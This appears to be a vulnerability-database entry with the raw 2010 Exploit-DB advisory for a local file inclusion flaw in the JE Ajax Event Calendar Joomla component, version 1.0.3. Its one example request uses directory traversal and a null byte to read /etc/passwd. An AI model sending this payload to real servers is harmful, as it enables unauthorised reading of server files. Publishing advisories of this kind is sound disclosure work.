JE Ajax Event Calendar Local File Inclusion Vulnerability

vendor:

JE Ajax event calendar

by:

Valentin Hoebel

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: JE Ajax event calendar

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

JE Ajax Event Calendar Local File Inclusion Vulnerability

JE Ajax Event Calendar is vulnerable to a Local File Inclusion vulnerability. This vulnerability allows an attacker to include a file from the local file system of the web server. An attacker can exploit this vulnerability by sending a specially crafted request to the web server. This vulnerability can be exploited by an unauthenticated attacker.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: JE Ajax Event Calendar Local File Inclusion Vulnerability
# Date: 14.05.2010
# Author: Valentin
# Category: webapps/0day
# Version: 1.0.3
# Tested on: 
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information 
Advisory/Exploit Title = JE Ajax Event Calendar Local File Inclusion Vulnerability
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JE Ajax event calendar
Vendor = Harmis Technology
Vendor Website = http://joomlaextensions.co.in/
Affected Version(s) = 1.0.3

 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = Local File Inclusion
Example URI = index.php?option=com_jeajaxeventcalendar&view=../../../../../../etc/passwd%00


[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 14.05.2010


[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
<3 packetstormsecurity.org!


[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]